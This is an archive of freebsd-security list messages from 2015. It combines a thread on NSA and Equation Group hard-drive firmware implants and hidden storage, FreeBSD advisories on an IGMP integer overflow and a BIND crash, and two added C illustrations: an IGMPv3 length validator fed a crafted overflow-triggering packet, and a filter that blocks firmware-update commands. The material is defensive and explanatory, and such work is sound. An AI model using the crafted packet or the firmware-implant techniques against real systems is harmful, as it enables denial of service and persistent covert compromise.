(......).....*, to encrypt data prior to sending to hard drive.

This is possible with GELI. There is no threat to freebsd when you are
using the tools given (proper implementation assumed).

Weaknesses of this measure are remote and highly costly for the attacker.
If one is such a person of interest triggering agencies to invest in
this, you can be sure, there are more cost effective ways to get them
what they want, and in this case, a more thorough threat analysis would
be advisable anyway.

Kernel options to permit only your approved list of opcodes and block
all else by default would seem useful to have.

> http://www.spiegel.de/media/media-35661.pdf

Again, look at the list of Unix operating systems and file systems.
These guys are calling Unix out by name, and soon the common script kid
will be too.

Unix is under attack and this stuff can't be ignored as "too rare and/or
hard and/or low market share to be relevant" anymore.
---------- Forwarded message ----------
Date: Mon, Feb 23, 2015 at 12:10 PM
Subject: Re: [Cryptography] trojans in the firmware

FYI -- CMU has been hacking disk drive firmware since the 1990's for
"smart disks" and "performance"; UCSD has been hacking flash drive
firmware more recently. I believe that DARPA has also openly solicited
for disk drive/flash drive firmware hacking capabilities. Both CMU &
UCSD are hotbeds of NSA recruitment activity.

We now know that in NSA parlance "smart" anything = "spying" anything;
e.g., "smart disks" = "spying disks"; "smart phones" = "spying phones",
etc.

BTW, hiding stuff in a flash memory stick is even easier than in a hard
drive. This is because flash memory is so unreliable, that there is
typically a huge percentage of unused space; the cheaper the flash
memory, the smaller the fraction of usable reliable memory space. So it
wouldn't be at all surprising to find that your 32GB flash drive is
really constructed from 64GB chips, and that 50% of the device is
unavailable for use. It is highly unlikely that _all_ of this unused
space is unreliable, so this leaves plenty of room for NSA lurking.

But even if the device were 100% reliable, noticing that only 50% was
actually in use would be unremarkable, given the typical degree of
unreliability of these types of devices.

For these reasons, it is critical for flash memory devices to _open up_
their API's, so that the raw memory (with all of its warts) can be
inspected and verified.

http://www.wired.com/2015/02/nsa-firmware-hacking/

How the NSA's Firmware Hacking Works and Why It's So Unsettling
By Kim Zetter 02.22.15 8:09 pm

One of the most shocking parts of the recently discovered spying network
Equation Group is its mysterious module designed to reprogram or reflash
a computer hard drive's firmware with malicious code. The Kaspersky
researchers who uncovered this said its ability to subvert hard drive
firmware - the guts of any computer - "surpasses anything else" they had
ever seen.

The hacking tool, believed to be a product of the NSA, is significant
because subverting the firmware gives the attackers God-like control of
the system in a way that is stealthy and persistent even through software
updates. The module, named "nls_933w.dll", is the first of its kind found
in the wild and is used with both the EquationDrug and GrayFish spy
platforms Kaspersky uncovered.

It also has another capability: to create invisible storage space on the
hard drive to hide data stolen from the system so the attackers can
retrieve it later. This lets spies like the Equation Group bypass disk
encryption by secreting documents they want to seize in areas that don't
get encrypted.

Kaspersky has so far uncovered 500 victims of the Equation Group, but
only five of these had the firmware-flashing module on their systems. The
flasher module is likely reserved for significant systems that present
special surveillance challenges. Costin Raiu, director of Kaspersky's
Global Research and Analysis Team, believes these are high-value
computers that are not connected to the internet and are protected with
disk encryption.

Here's what we know about the firmware-flashing module.

How It Works

Hard drive disks have a controller, essentially a mini-computer, that
includes a memory chip or flash ROM where the firmware code for operating
the hard drive resides.

When a machine is infected with EquationDrug or GrayFish, the firmware
flasher module gets deposited onto the system and reaches out to a
command server to obtain payload code that it then flashes to the
firmware, replacing the existing firmware with a malicious one. The
researchers uncovered two versions of the flasher module: one that
appears to have been compiled in 2010 and is used with EquationDrug and
one with a 2013 compilation date that is used with GrayFish.

The Trojanized firmware lets attackers stay on the system even through
software updates. If a victim, thinking his or her computer is infected,
wipes the computer's operating system and reinstalls it to eliminate any
malicious code, the malicious firmware code remains untouched. It can
then reach out to the command server to restore all of the other
malicious components that got wiped from the system.

Even if the firmware itself is updated with a new vendor release, the
malicious firmware code may still persist because some firmware updates
replace only parts of the firmware, meaning the malicious portions may
not get overwritten with the update. The only solution for victims is to
trash their hard drive and start over with a new one.

The attack works because firmware was never designed with security in
mind. Hard disk makers don't cryptographically sign the firmware they
install on drives the way software vendors do. Nor do hard drive disk
designs have authentication built in to check for signed firmware. This
makes it possible for someone to change the firmware. And firmware is the
perfect place to conceal malware because antivirus scanners don't examine
it. There's also no easy way for users to read the firmware and manually
check if it's been altered.

The firmware flasher module can reprogram the firmware of more than a
dozen different hard drive brands, including IBM, Seagate, Western
Digital, and Toshiba.

"You know how much effort it takes to land just one firmware for a hard
drive? You need to know specifications, the CPU, the architecture of the
firmware, how it works," Raiu says. The Kaspersky researchers have called
it "an astonishing technical accomplishment and is testament to the
group's abilities."

Once the firmware is replaced with the Trojanized version, the flasher
module creates an API that can communicate with other malicious modules
on the system and also access hidden sectors of the disk where the
attackers want to conceal data they intend to steal. They hide this data
in the so-called service area of the hard drive disk where the hard disk
stores data needed for its internal operation.

Hidden Storage Is the Holy Grail

The revelation that the firmware hack helps store data the attackers want
to steal didn't get much play when the story broke last week, but it's
the most significant part of the hack. It also raises a number of
questions about how exactly the attackers are pulling this off. Without
an actual copy of the firmware payload that gets flashed to infected
systems, there's still a lot that's unknown about the attack, but some of
it can be surmised.

The ROM chip that contains the firmware includes a small amount of
storage that goes unused. If the ROM chip is 2 megabytes, the firmware
might take up just 1.5 megabytes, leaving half a megabyte of unused space
that can be employed for hiding data the attackers want to steal.

This is particularly useful if the computer has disk encryption enabled.
Because the EquationDrug and GrayFish malware run in Windows, they can
grab a copy of documents while they're unencrypted and save them to this
hidden area on the machine that doesn't get encrypted. There isn't much
space on the chip for a lot of data or documents, however, so the
attackers can also just store something equally as valuable to bypass
encryption.
"Taking into account the fact that their GrayFish implant is active from
the very boot of the system, they have the ability to capture the
encryption password and save it into this hidden area," Raiu says.
Authorities could later grab the computer, perhaps through border
interdiction or something the NSA calls "customs opportunities," and
extract the password from this hidden area to unlock the encrypted disk.

http://cryptome.org/2014/05/nsa-customs.htm

Raiu thinks the intended targets of such a scheme are limited to machines
that are not connected to the internet and have encrypted hard drives.
One of the five machines they found hit with the firmware flasher module
had no internet connection and was used for special secure
communications.

"[The owners] only use it in some very specific cases where there is no
other way around it," Raiu says. "Think about Bin Laden who lived in the
desert in an isolated compound - doesn't have internet and no electronic
footprint. So if you want information from his computer how do you get
it? You get documents into the hidden area and you wait, and then after
one or two years you come back and steal it. The benefits [of using this]
are very specific."

Raiu thinks, however, that the attackers have a grander scheme in mind.
"In the future probably they want to take it to the next level where they
just copy all the documents [into the hidden area] instead of the
password. [Then] at some point, when they have an opportunity to have
physical access to the system, they can then access that hidden area and
get the unencrypted docs."

They wouldn't need the password if they could copy an entire directory
from the operating system to the hidden sector for accessing later.

But the flash chip where the firmware resides is too small for large
amounts of data. So the attackers would need a bigger hidden space for
storage. Luckily for them, it exists. There are large sectors in the
service area of the hard drive disk that are also unused and could be
commandeered to store a large cache of documents, even ones that might
have been deleted from other parts of the computer. This service area,
also called the reserved area or system area, stores the firmware and
other data needed to operate drives, but it also contains large portions
of unused space.

An interesting paper (.pdf) published in February 2013 by Ariel Berkman,
a data recovery specialist at the Israeli firm Recover, noted "not only
that these areas can't be sanitized (via standard tools), they cannot be
accessed via anti-virus software [or] computer forensics tools."

http://www.recover.co.il/SA-cover/SA-cover.pdf

Berkman points out that one particular model of Western Digital drives
has 141 MB reserved for the service area, but only uses 12 MB of this,
leaving the rest free for stealth storage.

To write or copy data to the service area requires special commands that
are specific to each vendor and are not publicly documented, so an
attacker would need to uncover what these are. But once they do, "[b]y
sending Vendor Specific Commands (VSCs) directly to the hard-drive, one
can manipulate these [service] areas to read and write data that are
otherwise inaccessible," Berkman writes. It is also possible, though not
trivial, to write a program to automatically copy documents to this area.
Berkman himself wrote a proof-of-concept program to read and write a file
of up to 94 MB to the service area, but the program was a bit unstable
and he noted that it could cause some data loss or cause the hard drive
to fail.

One problem with hiding large amounts of data like this, however, is that
its presence might be detected by examining the size of the used space in
the service area. If there should be 129 MB of unused space in this
sector but there's only 80 MB, it's a dead giveaway that something is
there that shouldn't be. But a leaked NSA document that was written in
2006 but was published by Der Spiegel last month suggests the spy agency
might have resolved this particular problem.

NSA Interns to the Rescue

The document (.pdf) is essentially a wish list of future spy capabilities
the NSA hoped to develop for its so-called Persistence Division, a
division that has an attack team within it that focuses on establishing
and maintaining persistence on compromised machines by subverting their
firmware, BIOS, BUS or drivers. The document lists a number of projects
the NSA put together for interns to tackle on behalf of this attack team.
Among them is the "Covert Storage" project for developing a hard drive
firmware implant that can prevent covert storage on disks from being
detected. To do this, the implant prevents the system from disclosing the
true amount of free space available on the disk.

http://www.spiegel.de/media/media-35661.pdf

"The idea would be to modify the firmware of a particular hard drive so
that it normally only recognizes, say, half of its available space," the
document reads. "It would report this size back to the operating system
and not provide any way to access the additional space." Only one
partition of the drive would be visible on the partition table, leaving
the other partitions - where the hidden data was stored - invisible and
inaccessible.

The modified firmware would have a special hook embedded in it that would
unlock this hidden storage space only after a custom command was sent to
the drive and the computer was rebooted. The hidden partition would then
be available on the partition table and accessible until the secret
storage was locked again with another custom command.

How exactly the spy agency planned to retrieve the hidden data was
unclear from the eight-year-old document. Also unclear is whether the
interns ever produced a firmware implant that accomplished what the NSA
sought. But given that the document includes a note that interns would be
expected to produce a solution for their project within six months after
assignment, and considering the proven ingenuity of the NSA in other
matters, they no doubt figured it out.

------------------------------

End of freebsd-security Digest, Vol 523, Issue 2
************************************************

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 06:29:25 2015
From: FreeBSD Security Advisories <security-advisories@freebsd.org>
To: FreeBSD Security Advisories
Date: Wed, 25 Feb 2015 06:29:25 GMT
Message-Id: <201502250629.t1P6TPnA007866@freefall.freebsd.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp

=============================================================================
FreeBSD-SA-15:04.igmp                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Integer overflow in IGMP protocol

Category:       core
Module:         igmp
Announced:      2015-02-25
Credits:        Mateusz Kocielski, Logicaltrust, Marek Kroemeke, and
                22733db72ab3ed94b5f8a1ffcde850251fe6f466
Affects:        All supported versions of FreeBSD.
Corrected:      2015-02-25 05:43:02 UTC (stable/10, 10.1-STABLE)
                2015-02-25 05:56:16 UTC (releng/10.1, 10.1-RELEASE-p6)
                2015-02-25 05:56:16 UTC (releng/10.0, 10.0-RELEASE-p18)
                2015-02-25 05:43:02 UTC (stable/9, 9.3-STABLE)
                2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10)
                2015-02-25 05:43:02 UTC (stable/8, 8.4-STABLE)
                2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24)
CVE Name:       CVE-2015-1414

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

IGMP is a control plane protocol used by IPv4 hosts and routers to
propagate multicast group membership information. IGMP version 3 is
implemented on FreeBSD.

II.  Problem Description

An integer overflow in computing the size of an IGMPv3 data buffer can
result in a buffer which is too small for the requested operation.

III. Impact

An attacker who can send specifically crafted IGMP packets could cause a
denial of service situation by causing the kernel to crash.

IV.  Workaround

Block incoming IGMP packets by protecting your host/networks with a
firewall.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch
# fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch.asc
# gpg --verify igmp.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.
Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/8/                                                         r279263
releng/8.4/                                                       r279265
stable/9/                                                         r279263
releng/9.3/                                                       r279265
stable/10/                                                        r279263
releng/10.0/                                                      r279264
releng/10.1/                                                      r279264
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. References

The latest revision of this advisory is available at

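The advisory names the bug class (an integer overflow while computing how large an IGMPv3 buffer has to be) but not the arithmetic. The program below is an added illustration written for this page; it is not FreeBSD's igmp.c and not the SA-15:04 patch. It validates a constructed IGMPv3 Membership Query (RFC 3376 section 4.1: a 12-byte fixed header followed by one 4-byte IPv4 address per entry in the Number of Sources field at offset 10), shows how a 16-bit length accumulator wraps for a hostile Number of Sources value so that a 12-byte packet looks "long enough", and shows the widened, bounded computation that rejects such a packet before any source address is read. All function names and sample packets are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IGMPv3 Membership Query, RFC 3376 section 4.1: 12 fixed bytes, then
 * Number of Sources (big-endian, offset 10) IPv4 addresses of 4 bytes each. */
#define IGMP_V3_QUERY_MINLEN 12u
#define IGMP_MEMBERSHIP_QUERY 0x11
#define IGMP_SRC_LEN          4u

enum igmp_rc {
    IGMP_OK           =  0,
    IGMP_ERR_TYPE     = -1,  /* not a Membership Query */
    IGMP_ERR_SHORT    = -2,  /* packet shorter than its header claims */
    IGMP_ERR_OVERFLOW = -3   /* header claims more than an IPv4 datagram can carry */
};

/* The pattern the advisory warns about: a 16-bit accumulator.  The multiply
 * itself is done in unsigned int, but the store truncates modulo 65536, so
 * nsrc = 0xFFFF yields 12 + 262140 = 262152 -> 8, smaller than the header. */
static uint16_t
igmpv3_query_len_unsafe(uint16_t nsrc)
{
    uint16_t len = (uint16_t)(IGMP_V3_QUERY_MINLEN + nsrc * IGMP_SRC_LEN);
    return len;
}

/* Widened, bounded computation: do the arithmetic in size_t and refuse any
 * result that could not fit into an IPv4 datagram (65535 bytes in total). */
static int
igmpv3_query_len_checked(uint16_t nsrc, size_t *need)
{
    size_t n = (size_t)IGMP_V3_QUERY_MINLEN + (size_t)nsrc * IGMP_SRC_LEN;
    if (n > UINT16_MAX)
        return IGMP_ERR_OVERFLOW;
    *need = n;
    return IGMP_OK;
}

/* Validate an IGMPv3 query of pktlen bytes; on success report its source count.
 * Every bound is established before the corresponding bytes are touched. */
int
igmpv3_validate_query(const uint8_t *pkt, size_t pktlen, uint16_t *nsrc_out)
{
    if (pktlen < IGMP_V3_QUERY_MINLEN)
        return IGMP_ERR_SHORT;
    if (pkt[0] != IGMP_MEMBERSHIP_QUERY)
        return IGMP_ERR_TYPE;

    uint16_t nsrc = (uint16_t)((pkt[10] << 8) | pkt[11]);
    size_t need;
    int rc = igmpv3_query_len_checked(nsrc, &need);
    if (rc != IGMP_OK)
        return rc;
    if (need > pktlen)          /* header promises sources that were never sent */
        return IGMP_ERR_SHORT;

    *nsrc_out = nsrc;
    return IGMP_OK;
}

/* Constructed sample packets (not captured traffic). */

/* Well-formed query for 224.0.0.1 listing sources 10.0.0.1 and 10.0.0.2. */
static const uint8_t sample_good[] = {
    0x11, 0x64, 0x00, 0x00,  0xe0, 0x00, 0x00, 0x01,
    0x02, 0x7d, 0x00, 0x02,                          /* QRV=2 QQIC=125 nsrc=2 */
    0x0a, 0x00, 0x00, 0x01,  0x0a, 0x00, 0x00, 0x02,
};
/* Same header claiming two sources, but the sources were never sent. */
static const uint8_t sample_truncated[] = {
    0x11, 0x64, 0x00, 0x00,  0xe0, 0x00, 0x00, 0x01,  0x02, 0x7d, 0x00, 0x02,
};
/* Hostile: Number of Sources = 0xFFFF with only the 12-byte header. */
static const uint8_t sample_hostile[] = {
    0x11, 0x64, 0x00, 0x00,  0xe0, 0x00, 0x00, 0x01,  0x02, 0x7d, 0xff, 0xff,
};

/* Convenience wrapper that discards the source count. */
int
validate_sample(const uint8_t *pkt, size_t len)
{
    uint16_t n = 0;
    return igmpv3_validate_query(pkt, len, &n);
}

/* 1 if the wrapped 16-bit length would let the hostile sample pass a
 * "is the packet at least this long?" check, 0 otherwise. */
int
unsafe_len_accepts_hostile(void)
{
    return igmpv3_query_len_unsafe(0xFFFF) <= sizeof(sample_hostile);
}

int
main(void)
{
    printf("good:      rc=%d\n", validate_sample(sample_good, sizeof sample_good));
    printf("truncated: rc=%d\n", validate_sample(sample_truncated, sizeof sample_truncated));
    printf("hostile:   rc=%d\n", validate_sample(sample_hostile, sizeof sample_hostile));
    printf("unsafe 16-bit length for nsrc=0xFFFF: %u (accepts hostile packet: %s)\n",
           igmpv3_query_len_unsafe(0xFFFF), unsafe_len_accepts_hostile() ? "yes" : "no");
    return 0;
}
```

The two defences are independent: widening the accumulator stops the wrap, and comparing the widened requirement against the bytes actually received stops a header that promises more sources than the datagram holds. Dropping IGMP at the firewall, as the workaround says, keeps both code paths from ever running on an unpatched host.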
From: FreeBSD Security Advisories <security-advisories@freebsd.org>
To: FreeBSD Security Advisories
Date: Wed, 25 Feb 2015 06:29:28 GMT
Message-Id: <201502250629.t1P6TSid007902@freefall.freebsd.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-15:05.bind

=============================================================================
FreeBSD-SA-15:05.bind                                       Security Advisory
                                                          The FreeBSD Project

Topic:          BIND remote denial of service vulnerability

Category:       contrib
Module:         bind
Announced:      2015-02-25
Credits:        ISC
Affects:        FreeBSD 8.x and FreeBSD 9.x.
Corrected:      2015-02-18 22:20:19 UTC (stable/9, 9.3-STABLE)
                2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10)
                2015-02-18 22:29:52 UTC (stable/8, 8.4-STABLE)
                2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24)
CVE Name:       CVE-2015-1349

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet Domain Name Server.

II.  Problem Description

BIND servers which are configured to perform DNSSEC validation and which
are using managed keys (which occurs implicitly when using
"dnssec-validation auto;" or "dnssec-lookaside auto;") may exhibit
unpredictable behavior due to the use of an improperly initialized
variable.

III. Impact

A remote attacker can trigger a crash of a name server that is configured
to use managed keys under specific and limited circumstances. However,
the complexity of the attack is very high unless the attacker has a
specific network relationship to the BIND server which is targeted.

IV.  Workaround

Only systems that run BIND, including recursive resolvers and authoritative
servers that perform DNSSEC validation and use managed-keys, are affected.

This issue can be worked around by not using "auto" for the dnssec-validation
or dnssec-lookaside options and not configuring a managed-keys statement.
Note that in order to do DNSSEC validation with this workaround one would
have to configure an explicit trusted-keys statement with the appropriate
keys.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch
# fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch.asc
# gpg --verify bind.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in .

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/8/                                                         r278973
releng/8.4/                                                       r279265
stable/9/                                                         r278972
releng/9.3/                                                       r279265
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. References

The latest revision of this advisory is available at

From: Bartek Rutkowski
To: freebsd-security
Cc: so@freebsd.org
Date: Wed, 25 Feb 2015 07:36:38 +0000
In-Reply-To: <201502250629.t1P6TSid007902@freefall.freebsd.org>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind

On Wed, Feb 25, 2015 at 6:29 AM, FreeBSD Security Advisories wrote:
> FreeBSD-SA-15:05.bind                                       Security Advisory
>                                                           The FreeBSD Project
>
> Topic:          BIND remote denial of service vulnerability
>
> Category:       contrib
> Module:         bind
> Announced:      2015-02-25
> Credits:        ISC
> Affects:        FreeBSD 8.x and FreeBSD 9.x.
> [...]
> 2) To update your vulnerable system via a binary patch:
>
> Systems running a RELEASE version of FreeBSD on the i386 or amd64
> platforms can be updated via the freebsd-update(8) utility:
>
> # freebsd-update fetch
> # freebsd-update install
>

Seems like freebsd-update is throwing some error:

root@04-dev:~ # freebsd-update install
Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory
 done.
root@04-dev:~ # uname -a
FreeBSD 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 08:55:07 UTC 2015     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64

Anything to worry about?

Kind regards,
Bartek Rutkowski

From: Xin Li
To: Bartek Rutkowski, freebsd-security
Cc: so@freebsd.org
Date: Tue, 24 Feb 2015 23:40:44 -0800
Message-ID: <54ED7C7C.3070202@delphij.net>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind

On 2/24/15 23:36, Bartek Rutkowski wrote:
> Seems like freebsd-update is throwing some error:
>
> root@04-dev:~ # freebsd-update install
> Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory
>  done.
> root@04-dev:~ # uname -a
> FreeBSD 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 08:55:07 UTC 2015     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
>
> Anything to worry about?

No.

This is a known issue with freebsd-update, which is confused by added
(source) files. For the purpose of patching your system there is nothing
to worry about.
Cheers,

From: grarpamp
To: freebsd-questions@freebsd.org
Cc: cypherpunks@cpunks.org, freebsd-security@freebsd.org
Date: Wed, 25 Feb 2015 05:42:09 -0500
In-Reply-To: <591A0ED4-FEE7-4190-9836-15E151D01B80@lrw.com>
Subject: Re: [Cryptography] trojans in the firmware

On Tue, Feb 24, 2015 at 10:48 AM, Kay Rydyger wrote:
>
> The question was [... firmware spies]
> The answer is [...] to encrypt data.

No, reading bits from platters or the bus is a partial analysis of the
whole firmware question. It's already been suggested in links how firmware
can hook the user's unencrypted boot binaries through to the user's kernel.
For that matter, a modified boot chain could be stored in the service area.

A user would have to use SecureBoot, TPM, IOMMU, TXT, GELI and perhaps
other things, all of them properly, having no holes, together, right now,
at least three of which they are unlikely to have ubiquitous access to
until a couple hardware generations or personal refresh cycles into the
future. An ideal full solution for which is yet to come.
Not to mention needing to install it all cleanly (from, BTW, an install
image which has no reproducible build and no cryptographic chain back to
the insecure unsigned source repo anyways).

But yeah, let's talk circular instead of about possibly actually coding
defense in depth such as maybe blocking the most common easiest path a
malicious opcode will likely take to irreparably infect clean hardware in
the first place... through the drivers...

> There is no threat to freebsd ... because at least Unix is said to be
> immune to threat...

http://www.freebsd.org/security/advisories.html
http://www.openbsd.org/errata56.html
http://web.nvd.nist.gov/view/vuln/search-results?query=linux+kernel&search_type=last3years&cves=on

> Weaknesses of this measure are remote and highly costly for the
> attacker. If one is such a person of interest

It's already been talked about how this tech will be integrated into
everyday run-of-the-mill malware. And how users will be subject to
infected drives via second purchase, inheritance (both from other people
and from other operating systems), use of hosting services, trading,
booting CDs, etc. Persistent malware in users' boot chains is nasty; users
don't have to be of interest or be targeted, the code doesn't care,
grandma's surfbox could get it.

Please learn to email... trim the original to the minimum needed for
context, reply inline below, and stop copying 400 line digests with
meaningless digest subject lines out to everyone on the list.

On whenever, someone else wrote:
> Since the chip holding the firmware has
> leads through which it is loaded with the firmware,
> is it not possible to disable or burn (with laser) or cut
> just the leads through which the chip is WRITTEN to
> (in order to re-program it)?

Depends on the design. The hacking links or docs from the drive/chip
vendors would be more helpful there.
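The proposal in the thread is to block the firmware-update command in the driver path, before it reaches a clean drive. The filter below is an added illustration written for this page; it is not FreeBSD code and is not attached to any real driver (where such a hook would sit is the design question the thread leaves open). It inspects a SCSI CDB of the kind a raw pass-through interface hands to a storage driver and refuses the two usual ways firmware arrives: SCSI WRITE BUFFER (opcode 3Bh) and ATA DOWNLOAD MICROCODE / DOWNLOAD MICROCODE DMA (92h / 93h) tunnelled through a SAT ATA PASS-THROUGH(12) or (16) CDB (opcodes A1h / 85h, ATA command byte at CDB offset 9 and 14 respectively). The CDBs are constructed for the example; the function and constant names are its own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* ATA commands that replace drive firmware (ATA command set). */
#define ATA_DOWNLOAD_MICROCODE      0x92
#define ATA_DOWNLOAD_MICROCODE_DMA  0x93
/* SCSI command that carries firmware to SCSI/SAS devices. */
#define SCSI_WRITE_BUFFER           0x3B
/* SAT wrappers that tunnel an ATA command inside a SCSI CDB. */
#define SCSI_ATA_PASS_THROUGH_12    0xA1
#define SCSI_ATA_PASS_THROUGH_16    0x85
/* Offset of the ATA COMMAND byte inside each wrapper CDB (SAT). */
#define SAT12_COMMAND_OFFSET        9
#define SAT16_COMMAND_OFFSET        14

enum verdict {
    VERDICT_ALLOW          = 0,
    VERDICT_DENY_FIRMWARE  = 1,  /* would rewrite drive firmware */
    VERDICT_DENY_MALFORMED = 2   /* too short to classify safely */
};

static bool
ata_opcode_writes_firmware(uint8_t op)
{
    return op == ATA_DOWNLOAD_MICROCODE || op == ATA_DOWNLOAD_MICROCODE_DMA;
}

/* Classify one CDB.  The policy is deliberately coarse: a wrapper CDB too
 * short to reach the tunnelled ATA opcode is refused rather than guessed at,
 * and every WRITE BUFFER mode is refused, not only the microcode modes. */
enum verdict
filter_cdb(const uint8_t *cdb, size_t len)
{
    if (cdb == NULL || len == 0)
        return VERDICT_DENY_MALFORMED;

    switch (cdb[0]) {
    case SCSI_WRITE_BUFFER:
        return VERDICT_DENY_FIRMWARE;
    case SCSI_ATA_PASS_THROUGH_12:
        if (len < 12)
            return VERDICT_DENY_MALFORMED;
        return ata_opcode_writes_firmware(cdb[SAT12_COMMAND_OFFSET])
            ? VERDICT_DENY_FIRMWARE : VERDICT_ALLOW;
    case SCSI_ATA_PASS_THROUGH_16:
        if (len < 16)
            return VERDICT_DENY_MALFORMED;
        return ata_opcode_writes_firmware(cdb[SAT16_COMMAND_OFFSET])
            ? VERDICT_DENY_FIRMWARE : VERDICT_ALLOW;
    default:
        return VERDICT_ALLOW;     /* ordinary I/O and inquiry traffic */
    }
}

/* Constructed CDBs (not captured from a real host). */
static const uint8_t cdb_read10[10]       = { 0x28, 0, 0, 0, 0, 0, 0, 0, 1, 0 };
static const uint8_t cdb_write_buffer[10] = { 0x3B, 0x05, 0, 0, 0, 0, 0, 0, 0, 0 };
/* ATA PASS-THROUGH(16) carrying IDENTIFY DEVICE (ECh): harmless. */
static const uint8_t cdb_sat16_identify[16] =
    { 0x85, 0x08, 0x0e, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0x40, 0xEC, 0 };
/* ATA PASS-THROUGH(16) carrying DOWNLOAD MICROCODE (92h). */
static const uint8_t cdb_sat16_fwupdate[16] =
    { 0x85, 0x0a, 0x06, 0, 0x07, 0, 0, 0, 0, 0, 0, 0, 0, 0x40, 0x92, 0 };
/* ATA PASS-THROUGH(12) carrying DOWNLOAD MICROCODE DMA (93h). */
static const uint8_t cdb_sat12_fwupdate_dma[12] =
    { 0xA1, 0x0c, 0x06, 0x07, 0, 0, 0, 0, 0x40, 0x93, 0, 0 };
/* ATA PASS-THROUGH(12) cut to 8 bytes: the ATA opcode is not visible. */
static const uint8_t cdb_sat12_truncated[8] = { 0xA1, 0x0c, 0x06, 0x07, 0, 0, 0, 0 };

int
main(void)
{
    static const char *name[] = { "allow", "deny (firmware update)", "deny (malformed)" };
    printf("READ(10):                 %s\n", name[filter_cdb(cdb_read10, sizeof cdb_read10)]);
    printf("WRITE BUFFER:             %s\n", name[filter_cdb(cdb_write_buffer, sizeof cdb_write_buffer)]);
    printf("SAT16 IDENTIFY DEVICE:    %s\n", name[filter_cdb(cdb_sat16_identify, sizeof cdb_sat16_identify)]);
    printf("SAT16 DOWNLOAD MICROCODE: %s\n", name[filter_cdb(cdb_sat16_fwupdate, sizeof cdb_sat16_fwupdate)]);
    printf("SAT12 DOWNLOAD MICROCODE DMA: %s\n", name[filter_cdb(cdb_sat12_fwupdate_dma, sizeof cdb_sat12_fwupdate_dma)]);
    printf("SAT12 truncated:          %s\n", name[filter_cdb(cdb_sat12_truncated, sizeof cdb_sat12_truncated)]);
    return 0;
}
```

Two caveats follow from the thread itself. A filter like this only covers the paths it is placed on: a native ATA request that never passes through a SCSI CDB, or a vendor-specific command that updates firmware without using these opcodes, is not caught, so it has to sit where every path to the device converges and has to be extended per vendor ("depends on the design"). And it does nothing for a drive that arrived already rooted; it is the "keep a clean drive clean" layer, and legitimate vendor updates then need an explicit administrative switch to lift the block.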
From: Karl Pielorz
To: freebsd-security@freebsd.org
Date: Wed, 25 Feb 2015 11:24:16 +0000
Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?

Hi,

Presumably if you don't need IGMP, ipfw can be used to mitigate this on
hosts until they're patched / rebooted, i.e.

ipfw add x deny igmp from any to any

?
Thanks,

-Karl

---------- Forwarded Message ----------
Date: 25 February 2015 06:29 +0000
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp

